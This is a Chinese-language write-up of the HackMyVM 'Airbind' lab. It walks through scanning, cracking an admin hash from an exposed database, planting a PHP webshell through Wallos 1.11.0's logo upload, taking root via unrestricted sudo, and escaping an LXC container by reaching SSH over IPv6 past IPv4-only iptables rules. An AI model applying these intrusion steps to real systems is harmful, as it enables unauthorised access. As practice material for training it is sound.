Airbind - hackmyvm

简介

靶机名称：Airbind

难度：中等

靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Airbind

本地环境

虚拟机：vitual box

靶场IP（Airbind）：192.168.56.121

跳板机IP(windows 11)：192.168.56.1 192.168.190.100

渗透机IP(kali)：192.168.190.131

扫描

nmap有点慢，fscan先探路

fscan -h 192.168.56.121 -nobr -p "1-65535"


   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.56.121:110 open
192.168.56.121:80 open
192.168.56.121:25 open

没有22还是挺意外的。

HTTP

wallos，开源的个人订阅管理工具，虽然感觉大多用来做管账的了。

先来一波目录扫描

feroxbuster -u http://192.168.56.121/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -C 500 -d 3

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.121/
 🚀  Threads               │ 20
 📖  Wordlist              │ /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 3
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://192.168.56.121/ => login.php
301      GET        9l       28w      317c http://192.168.56.121/images => http://192.168.56.121/images/
301      GET        9l       28w      322c http://192.168.56.121/screenshots => http://192.168.56.121/screenshots/
301      GET        9l       28w      318c http://192.168.56.121/scripts => http://192.168.56.121/scripts/
301      GET        9l       28w      319c http://192.168.56.121/includes => http://192.168.56.121/includes/
200      GET        9l       28w      375c http://192.168.56.121/scripts/all.js
200      GET      322l      778w    11190c http://192.168.56.121/scripts/dashboard.js
200      GET       27l       69w      980c http://192.168.56.121/scripts/stats.js
200      GET       86l      175w     2766c http://192.168.56.121/scripts/common.js
200      GET      512l     2136w   157375c http://192.168.56.121/screenshots/mobilelight.png
301      GET        9l       28w      313c http://192.168.56.121/db => http://192.168.56.121/db/
200      GET      460l     2012w   162479c http://192.168.56.121/screenshots/mobiledark.png
200      GET       29l      170w    11662c http://192.168.56.121/images/wallossolid.png
200      GET       20l      134w    10939c http://192.168.56.121/images/wallossolidwhite.png
200      GET        1l       61w      742c http://192.168.56.121/images/avatars/0.svg
200      GET        1l       65w      770c http://192.168.56.121/images/avatars/2.svg
200      GET        1l       65w      774c http://192.168.56.121/images/avatars/9.svg
200      GET        1l       61w      743c http://192.168.56.121/images/avatars/4.svg
200      GET        1l       65w      772c http://192.168.56.121/images/avatars/7.svg
200      GET        1l       61w      744c http://192.168.56.121/images/avatars/5.svg
200      GET       92l      377w    35699c http://192.168.56.121/images/Thumbs.db
200      GET       21l      165w    13170c http://192.168.56.121/images/wallos.png
200      GET      234l     1009w    87009c http://192.168.56.121/images/siteimages/empty.png
200      GET      252l     1363w   104335c http://192.168.56.121/images/siteimages/emptydark.png
200      GET      319l     1997w   190431c http://192.168.56.121/images/screenshots/desktop.png
200      GET      432l     2711w   279880c http://192.168.56.121/screenshots/form.png
200      GET      385l     2122w   176589c http://192.168.56.121/images/screenshots/mobile.png
200      GET      655l     4061w   394537c http://192.168.56.121/screenshots/dashboardlight.png
301      GET        9l       28w      317c http://192.168.56.121/styles => http://192.168.56.121/styles/
200      GET       34l       60w      663c http://192.168.56.121/styles/login-dark-theme.css
200      GET      119l      210w     2099c http://192.168.56.121/styles/login.css
200      GET      120l      465w     5538c http://192.168.56.121/styles/barlow.css
200      GET      114l      191w     1950c http://192.168.56.121/styles/dark-theme.css
200      GET     1286l     2376w    21792c http://192.168.56.121/styles/styles.css
200      GET        9l      153w   102217c http://192.168.56.121/styles/font-awesome.min.css
200      GET      172l     1150w   118155c http://192.168.56.121/screenshots/dashboarddark.png
200      GET       36l      145w     2473c http://192.168.56.121/scripts/i18n/el.js
200      GET       36l      156w     1804c http://192.168.56.121/scripts/i18n/pt.js
200      GET        7l       16w      139c http://192.168.56.121/scripts/i18n/getlang.js
200      GET       36l      194w     1982c http://192.168.56.121/scripts/i18n/fr.js
200      GET       36l      167w     1755c http://192.168.56.121/scripts/i18n/es.js
200      GET       36l       73w     1773c http://192.168.56.121/scripts/i18n/jp.js
200      GET      845l     1847w    27985c http://192.168.56.121/scripts/settings.js
200      GET       69l      141w     1949c http://192.168.56.121/scripts/registration.js
200      GET      129l     1038w   113182c http://192.168.56.121/screenshots/settings.png
200      GET        0l        0w        0c http://192.168.56.121/includes/connect_endpoint_crontabs.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/es.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/languages.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/el.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/fr.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/pt.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/en.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/jp.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/de.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/zh_cn.php
200      GET        0l        0w        0c http://192.168.56.121/includes/version.php
200      GET        0l        0w        0c http://192.168.56.121/includes/currency_formatter.php
200      GET        0l        0w        0c http://192.168.56.121/includes/inputvalidation.php
200      GET       20l     3034w   205222c http://192.168.56.121/scripts/libs/chart.js
200      GET       90l      522w    65770c http://192.168.56.121/db/wallos.db
200      GET       13l       42w     2063c http://192.168.56.121/images/siteicons/delete.png
200      GET        6l       33w     1795c http://192.168.56.121/images/siteicons/sort.png
200      GET        4l       25w     1644c http://192.168.56.121/images/siteicons/editavatar.png
200      GET        6l       34w     1514c http://192.168.56.121/images/siteicons/notes.png
200      GET        4l       34w     2116c http://192.168.56.121/images/siteicons/subscription.png
200      GET       10l       45w     2607c http://192.168.56.121/images/siteicons/websearch.png
200      GET        5l       52w     2757c http://192.168.56.121/images/siteicons/web.png
200      GET        5l       27w     1787c http://192.168.56.121/images/siteicons/category.png
200      GET       26l      137w    13047c http://192.168.56.121/images/walloswhite.png
200      GET        5l       14w     1196c http://192.168.56.121/images/icon/favicon-16x16.png
200      GET        5l       30w    30457c http://192.168.56.121/images/icon/favicon.ico
200      GET       10l       39w     2664c http://192.168.56.121/images/icon/favicon-32x32.png
200      GET       53l      244w    14827c http://192.168.56.121/images/icon/maskable_icon_x192.png
200      GET       44l      245w    19162c http://192.168.56.121/images/icon/android-chrome-192x192.png
200      GET       31l      183w    17772c http://192.168.56.121/images/icon/apple-touch-icon.png
200      GET       73l      261w    25255c http://192.168.56.121/images/siteimages/Thumbs.db
200      GET      122l      887w    50180c http://192.168.56.121/images/icon/android-chrome-512x512.png
200      GET        1l       65w      771c http://192.168.56.121/images/avatars/1.svg
200      GET      141l      832w    41046c http://192.168.56.121/images/icon/maskable_icon_x512.png
200      GET        1l       65w      773c http://192.168.56.121/images/avatars/3.svg
200      GET        1l       61w      743c http://192.168.56.121/images/avatars/8.svg
200      GET        1l       65w      775c http://192.168.56.121/images/avatars/6.svg
200      GET       38l      154w     1875c http://192.168.56.121/scripts/i18n/de.js
200      GET       36l      143w     1594c http://192.168.56.121/scripts/i18n/en.js
200      GET       36l       73w     1595c http://192.168.56.121/scripts/i18n/zh_cn.js
200      GET       39l      133w     1637c http://192.168.56.121/scripts/i18n/tr.js
200      GET       36l       73w     1631c http://192.168.56.121/scripts/i18n/zh_tw.js
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/tr.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/zh_tw.php
200      GET        0l        0w        0c http://192.168.56.121/includes/i18n/getlang.php
200      GET        9l       35w     1807c http://192.168.56.121/images/siteicons/edit.png
200      GET        9l       47w     2440c http://192.168.56.121/images/siteicons/save.png
200      GET        5l       26w     1061c http://192.168.56.121/images/siteicons/filter.png
200      GET        4l       71w     2223c http://192.168.56.121/images/siteicons/check.png
200      GET        5l       34w     1888c http://192.168.56.121/images/siteicons/payment.png
200      GET        7l       24w     1351c http://192.168.56.121/images/siteicons/plusicon.png
301      GET        9l       28w      315c http://192.168.56.121/libs => http://192.168.56.121/libs/
200      GET        0l        0w        0c http://192.168.56.121/libs/PHPMailer/SMTP.php
200      GET        0l        0w        0c http://192.168.56.121/libs/PHPMailer/Exception.php
200      GET        0l        0w        0c http://192.168.56.121/libs/PHPMailer/PHPMailer.php

扫到了db文件，真是严重的信息泄露啊……

在user表中找到账号和hash信息

丢进cmd5，解得密码为admin

成功登陆

得到版本是1.11.0

在explot database中找到符合要求的POC

https://www.exploit-db.com/exploits/51924

这个只是个教程，不过照着做就行了

文件上传漏洞

首先在主页上新建一个订阅

然后右上角有一个upload Logo，先随便上传个正常图片抓包

然后在重放器里面把图片后缀改成.php,再留个图片头，就可以写webshell了

然后上传的图片都会重命名放到http://192.168.56.121/images/uploads/logos/路径下。

蚁剑连接成功

提权

sudo -l起手

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

草，有点离谱

www-data@ubuntu:/tmp$ sudo bash
sudo bash
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)

结束……等等，/root下面居然只有user.txt？

逃逸

这下有意思了，看来拿到最高权限还不是终点

结果看到ip信息才明白了

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.0.3.241/24 brd 10.0.3.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::dea1:f7ff:fe82:7613/64 scope link
       valid_lft forever preferred_lft forever
3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
6: ap0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff

用linpeas看了眼，我们这是在lxc容器里面呢……

Container Runtime: lxc
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: unconfined
Capabilities:
        BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_tty_config mknod lease audit_write audit_control setfcap syslog wake_alarm block_suspend audit_read

先传个fscan进来看看情况。

./fscan -h 10.0.3.0/24 --nobr

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 10.0.3.1        is alive
(icmp) Target 10.0.3.241      is alive
[*] Icmp alive hosts len is: 2
10.0.3.241:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://10.0.3.241         code:302 len:0      title:None 跳转url: http://10.0.3.241/login.php
[*] WebTitle http://10.0.3.241/login.php code:200 len:1924   title:Wallos - Subscription Tracker
已完成 1/1
[*] 扫描结束,耗时: 6.554345504s

./fscan -h 10.0.3.1 -p 1-65535 -nobr

start infoscan
10.0.3.1:53 open
[*] alive ports len is: 1

这下沉默了

ipv6绕过iptables

卡了好久，最后从ll104567佬的视频了解到iptables命令只对v4过滤，想要配置v6的话要使用ip6tables。估计很多防火墙都会在这一点上疏忽，不过我还是头一次知道这种利用方法，非常感谢非常感谢！

首先这里在靶机里面使用ping6命令进行探测是不行的，探测出来的v6地址也只能是虚拟网卡的地址

root@:~# ping6 -I eth0 ff02::1%2 | cut -d\  -f4
ping6: Warning: source address might be selected on device other than: eth0
::
fe80::dea1:f7ff:fe82:7613%eth0:
fe80::216:3eff:fe00:0%eth0:

然后因为我的跳板机是windows，所以最方便的方法就是使用netsh的邻居发现功能

netsh interface ipv6 show neighbors

靶机的v6地址可能是fe80::a00:27ff:fed3:e511

然后在arp表项里面对照一下v4地址就能验证了。

arp -a | findstr 08-00-27-d3-e5-11

注意windows使用ipv6地址需要在末尾加上%[接口号]，不然会识别不到

nmap扫描成功

nmap.exe -6  fe80::a00:27ff:fed3:e511%10

Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-18 21:47 中国标准时间
Nmap scan report for fe80::a00:27ff:fed3:e511
Host is up (0.0000060s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:D3:E5:11 (Oracle VirtualBox virtual NIC)

nnd，果然在这里开着ssh

把容器的root用户下的ssh私钥拖出来后使用，即可直接连接靶机。

2bd693135712f88726c22770278a2dcf

最后来看看靶机的iptables是怎么配置的吧

root@airbind:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     tcp  --  192.168.10.0/24      anywhere             tcp dpt:ssh
DROP       tcp  --  anywhere             anywhere             tcp dpt:ssh

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination